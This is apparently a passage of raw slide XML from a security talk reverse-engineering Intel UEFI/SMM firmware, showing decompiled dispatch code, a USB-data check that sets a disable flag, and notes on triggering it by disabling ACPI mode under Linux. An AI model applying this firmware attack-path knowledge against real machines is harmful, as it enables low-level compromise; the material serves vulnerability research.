              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Intel of course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>To check this we have built a stand →</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The latest firmware version is 0048</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="Shape 647"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Determining the coverage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 648"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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649" name="Shape 649"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762975" y="1609174"/>
            <a:ext cx="4710049" cy="32636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654" name="Shape 654"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Shape 655"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651050" y="1559865"/>
            <a:ext cx="9682200" cy="447090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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DispatchFunction()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( byte_1B158 == 1 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return 0i64;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( sub_1A80C(usb_data) &lt; 0 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>byte_1B159 = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>byte_1B158 = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return 0i64;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>In what cases byte_1B158 takes the value 1?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>if sub_1A80C returns the negative value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>xref: sub_5EEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>There is only one xref to sub_5EEC...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Shape 656"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>The fix?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Shape 657"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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662" name="Shape 662"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Shape 663"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656200" y="1556350"/>
            <a:ext cx="11225100" cy="454980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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int __fastcall sub_5F1C(EFI_GUID *Protocol, void *Interface, EFI_HANDLE Handle)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	signed __int64 v3; // rax@1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	char v5; // [sp+20h] [bp-18h]@2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	void *acpi_en_dispatch; // [sp+58h] [bp+20h]@1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	v3 = Smst-&gt;SmmLocateProtocol(&amp;EFI_ACPI_EN_DISPATCH_PROTOCOL_GUID, 0i64, &amp;acpi_en_ dispatch);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( v3 &gt;= 0 )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	LODWORD(v3) = (*acpi_en_dispatch)(acpi_en_dispatch, sub_5EEC, &amp;v5);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return v3;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The sub_5EEC function will be called if a certain event occurs in AcpiModeEnable module.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>So it’s not trivial to exploit this in Windows 10 as long as since Vista all drivers use the ACPI mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>But in Linux we can disable the ACPI mode.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Shape 664"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
